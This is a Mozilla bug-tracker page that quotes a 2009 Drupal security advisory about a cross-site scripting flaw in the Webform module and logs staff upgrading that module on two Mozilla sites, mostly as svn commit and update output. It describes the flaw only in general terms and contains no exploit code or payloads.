Closed
Bug 496182
Opened 15 years ago
Closed 15 years ago
SA-CONTRIB-2009-032 - Webform - Cross-site scripting
Categories
(Infrastructure & Operations Graveyard :: WebOps: Other, task)
Infrastructure & Operations Graveyard
WebOps: Other
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: abuchanan, Assigned: oremj)
References
Details
(Keywords: wsec-xss)
* Advisory ID: DRUPAL-SA-CONTRIB-2009-032 * Project: Webform (third-party module) * Versions: 5.x, 6.x * Date: 2009-June-03 * Security risk: Moderately critical * Exploitable from: Remote * Vulnerability: Cross-site scripting -------- DESCRIPTION --------------------------------------------------------- The Webform module provides a node type which is typically used to enable site visitors to fill in questionnaires, contact or request/registration forms, surveys, polls, or other forms on a Drupal site. When displaying the results of Webform submissions, the module does not properly filter user entered data, leading to a cross-site scripting [1] (XSS) vulnerability on sites with a specific configuration of input formats that would normally be safe. Such an attack carried out against a sufficiently privileged user may lead a malicious user to gain administrator access to the site. -------- VERSIONS AFFECTED --------------------------------------------------- * Versions of Webform for Drupal 5.x prior to 5.x-2.7 * Versions of Webform for Drupal 6.x prior to 6.x-2.7 Drupal core is not affected. If you do not use the contributed Webform module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Install the latest version: * If you use Webform for Drupal 5.x, upgrade to Webform 5.x-2.7 [2]. * If you use Webform for Drupal 6.x, upgrade to Webform 6.x-2.7 [3]. This affects SFx and QMO See also the Webform project page [4]. -------- REPORTED BY --------------------------------------------------------- David Rothstein [5] -------- FIXED BY ------------------------------------------------------------ Nathan Haug (quicksketch [6]), and David Rothstein [7] of the Drupal Security Team [8] -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/node/481260 [3] http://drupal.org/node/481258 [4] http://drupal.org/project/webform [5] http://drupal.org/user/124982 [6] http://drupal.org/user/35821 [7] http://drupal.org/user/124982 [8] http://drupal.org/security-team _______________________________________________ Security-news mailing list Security-news@drupal.org http://lists.drupal.org/listinfo/security-news
Reporter | ||
Comment 1•15 years ago
|
||
r27034 and r27035 update webform on QMO and SFx Paul, Tomcat, could you please check webform on QMO stage and give the go ahead to tag for production?
Comment 2•15 years ago
|
||
Confirmed that webform on QMO stage is up to version 6.x-2.7.
Comment 3•15 years ago
|
||
Alex, did you commit on production too?
Reporter | ||
Comment 4•15 years ago
|
||
not yet, tagging for production now
Reporter | ||
Comment 5•15 years ago
|
||
Over to IT to svn up production and run updates.php on QMO and SFx, please. Thanks everyone. QMO: Sending tags/production/sites/all/modules/webform Sending tags/production/sites/all/modules/webform/components/date.inc Sending tags/production/sites/all/modules/webform/components/email.inc Sending tags/production/sites/all/modules/webform/components/fieldset.inc Sending tags/production/sites/all/modules/webform/components/file.inc Sending tags/production/sites/all/modules/webform/components/grid.inc Sending tags/production/sites/all/modules/webform/components/hidden.inc Sending tags/production/sites/all/modules/webform/components/markup.inc Sending tags/production/sites/all/modules/webform/components/pagebreak.inc Sending tags/production/sites/all/modules/webform/components/select.inc Sending tags/production/sites/all/modules/webform/components/textarea.inc Sending tags/production/sites/all/modules/webform/components/textfield.inc Sending tags/production/sites/all/modules/webform/components/time.inc Sending tags/production/sites/all/modules/webform/tests/components.test Sending tags/production/sites/all/modules/webform/tests/permissions.test Sending tags/production/sites/all/modules/webform/tests/submission.test Sending tags/production/sites/all/modules/webform/tests/webform.test Sending tags/production/sites/all/modules/webform/translations/de.po Sending tags/production/sites/all/modules/webform/translations/el.po Sending tags/production/sites/all/modules/webform/translations/nl.po Sending tags/production/sites/all/modules/webform/translations/webform.pot Sending tags/production/sites/all/modules/webform/webform-confirmation.tpl.php Sending tags/production/sites/all/modules/webform/webform-form.tpl.php Sending tags/production/sites/all/modules/webform/webform-mail.tpl.php Sending tags/production/sites/all/modules/webform/webform.css Sending tags/production/sites/all/modules/webform/webform.info Sending tags/production/sites/all/modules/webform/webform.install Sending tags/production/sites/all/modules/webform/webform.js Sending tags/production/sites/all/modules/webform/webform.module Sending tags/production/sites/all/modules/webform/webform_components.inc Sending tags/production/sites/all/modules/webform/webform_export.inc Sending tags/production/sites/all/modules/webform/webform_report.inc Sending tags/production/sites/all/modules/webform/webform_submissions.inc Transmitting file data ................................ Committed revision 27038. SFX: Sending tags/production/sites/all/modules/webform Sending tags/production/sites/all/modules/webform/THEMING.txt Sending tags/production/sites/all/modules/webform/components/date.inc Sending tags/production/sites/all/modules/webform/components/email.inc Sending tags/production/sites/all/modules/webform/components/fieldset.inc Sending tags/production/sites/all/modules/webform/components/file.inc Sending tags/production/sites/all/modules/webform/components/grid.inc Sending tags/production/sites/all/modules/webform/components/hidden.inc Sending tags/production/sites/all/modules/webform/components/markup.inc Sending tags/production/sites/all/modules/webform/components/pagebreak.inc Sending tags/production/sites/all/modules/webform/components/select.inc Sending tags/production/sites/all/modules/webform/components/textarea.inc Sending tags/production/sites/all/modules/webform/components/textfield.inc Sending tags/production/sites/all/modules/webform/components/time.inc Sending tags/production/sites/all/modules/webform/po/da.po Sending tags/production/sites/all/modules/webform/po/de.po Sending tags/production/sites/all/modules/webform/po/el.po Sending tags/production/sites/all/modules/webform/po/es.po Sending tags/production/sites/all/modules/webform/po/fr.po Sending tags/production/sites/all/modules/webform/po/he.po Sending tags/production/sites/all/modules/webform/po/hu.po Sending tags/production/sites/all/modules/webform/po/it.po Sending tags/production/sites/all/modules/webform/po/nl.po Sending tags/production/sites/all/modules/webform/po/ru.po Sending tags/production/sites/all/modules/webform/po/sv.po Sending tags/production/sites/all/modules/webform/po/webform.pot Sending tags/production/sites/all/modules/webform/webform.css Sending tags/production/sites/all/modules/webform/webform.info Sending tags/production/sites/all/modules/webform/webform.install Sending tags/production/sites/all/modules/webform/webform.module Sending tags/production/sites/all/modules/webform/webform_components.inc Sending tags/production/sites/all/modules/webform/webform_report.inc Sending tags/production/sites/all/modules/webform/webform_submissions.inc Transmitting file data ................................ Committed revision 27039.
Assignee: nobody → server-ops
Component: Other → Server Operations: Web Content Push
Product: Websites → mozilla.org
QA Contact: other → mrz
Version: unspecified → other
Comment 6•15 years ago
|
||
Thanks Alex!
Assignee | ||
Updated•15 years ago
|
Assignee: server-ops → oremj
Reporter | ||
Comment 8•15 years ago
|
||
bug 496378 tags sfx 3.0.1 for production. This bug and that bug can be launched at the same time.
Reporter | ||
Comment 9•15 years ago
|
||
making this critical just to make sure it's on the radar for today
Severity: normal → critical
Assignee | ||
Comment 10•15 years ago
|
||
quality.mozilla.org]# svn up U sites/all/themes/qmo/qmo.js U sites/all/themes/qmo/css/mozqa.css A sites/all/modules/webform/translations/cs.po U sites/all/modules/webform/translations/webform.pot U sites/all/modules/webform/translations/de.po U sites/all/modules/webform/translations/nl.po A sites/all/modules/webform/translations/ja.po A sites/all/modules/webform/translations/sk.po U sites/all/modules/webform/translations/el.po U sites/all/modules/webform/webform.module U sites/all/modules/webform/components/email.inc U sites/all/modules/webform/components/textfield.inc U sites/all/modules/webform/components/hidden.inc U sites/all/modules/webform/components/date.inc U sites/all/modules/webform/components/textarea.inc U sites/all/modules/webform/components/time.inc U sites/all/modules/webform/components/fieldset.inc U sites/all/modules/webform/components/file.inc U sites/all/modules/webform/components/markup.inc U sites/all/modules/webform/components/select.inc U sites/all/modules/webform/components/pagebreak.inc U sites/all/modules/webform/components/grid.inc U sites/all/modules/webform/webform-form.tpl.php U sites/all/modules/webform/webform.css U sites/all/modules/webform/webform.info U sites/all/modules/webform/tests/webform.test U sites/all/modules/webform/tests/components.test U sites/all/modules/webform/tests/permissions.test U sites/all/modules/webform/tests/submission.test U sites/all/modules/webform/webform_report.inc U sites/all/modules/webform/webform-mail.tpl.php U sites/all/modules/webform/webform.install U sites/all/modules/webform/webform_submissions.inc U sites/all/modules/webform/webform_export.inc U sites/all/modules/webform/webform-confirmation.tpl.php U sites/all/modules/webform/webform.js A sites/all/modules/webform/po A sites/all/modules/webform/po/da.po A sites/all/modules/webform/po/cs.po A sites/all/modules/webform/po/webform.pot A sites/all/modules/webform/po/ru.po A sites/all/modules/webform/po/es.po A sites/all/modules/webform/po/fr.po A sites/all/modules/webform/po/de.po A sites/all/modules/webform/po/sv.po A sites/all/modules/webform/po/nl.po A sites/all/modules/webform/po/he.po A sites/all/modules/webform/po/hu.po A sites/all/modules/webform/po/it.po A sites/all/modules/webform/po/sk.po A sites/all/modules/webform/po/el.po U sites/all/modules/webform/webform_components.inc U sites/all/modules/webform Updated to revision 27162. www.spreadfirefox.com]# svn up U sites/all/themes/sfxBB/page-footer.tpl.php A sites/all/themes/sfxBB/img/sumo-icon.png U sites/all/themes/sfxBB/page-affiliates-get_button.tpl.php A sites/all/themes/sfxBB/page-contact-us.tpl.php U sites/all/themes/sfxBB/page-header.tpl.php U sites/all/themes/sfxBB/css/main.css U sites/all/themes/sfxBB U sites/all/modules/sfx_photostream/sfx_photostream.module U sites/all/modules/sfx_photostream U sites/all/modules/sfx_affiliates/sfx_affiliates.module U sites/all/modules/sfx_affiliates A sites/all/modules/sfx/tests A sites/all/modules/sfx/tests/sfx_affiliates.test U sites/all/modules/sfx/sfx.module U sites/all/modules/sfx U sites/all/modules/webform/components/email.inc U sites/all/modules/webform/components/textfield.inc U sites/all/modules/webform/components/hidden.inc U sites/all/modules/webform/components/date.inc U sites/all/modules/webform/components/textarea.inc U sites/all/modules/webform/components/time.inc U sites/all/modules/webform/components/fieldset.inc U sites/all/modules/webform/components/file.inc U sites/all/modules/webform/components/markup.inc U sites/all/modules/webform/components/select.inc U sites/all/modules/webform/components/pagebreak.inc U sites/all/modules/webform/components/grid.inc U sites/all/modules/webform/webform.module U sites/all/modules/webform/webform.css U sites/all/modules/webform/webform.info U sites/all/modules/webform/webform_report.inc U sites/all/modules/webform/webform.install U sites/all/modules/webform/webform_submissions.inc U sites/all/modules/webform/THEMING.txt A sites/all/modules/webform/webform_export.inc U sites/all/modules/webform/po/da.po A sites/all/modules/webform/po/cs.po U sites/all/modules/webform/po/webform.pot U sites/all/modules/webform/po/ru.po U sites/all/modules/webform/po/es.po U sites/all/modules/webform/po/fr.po U sites/all/modules/webform/po/de.po U sites/all/modules/webform/po/sv.po U sites/all/modules/webform/po/nl.po U sites/all/modules/webform/po/he.po U sites/all/modules/webform/po/hu.po U sites/all/modules/webform/po/it.po A sites/all/modules/webform/po/sk.po U sites/all/modules/webform/po/el.po U sites/all/modules/webform/webform_components.inc U sites/all/modules/webform U sites/all/modules/contact_us/contact_us.module U sites/all/modules/contact_us Updated to revision 27163.
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
Comment 11•11 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Updated•11 years ago
|
Component: Server Operations: Web Operations → WebOps: Other
Product: mozilla.org → Infrastructure & Operations
Updated•5 years ago
|
Product: Infrastructure & Operations → Infrastructure & Operations Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•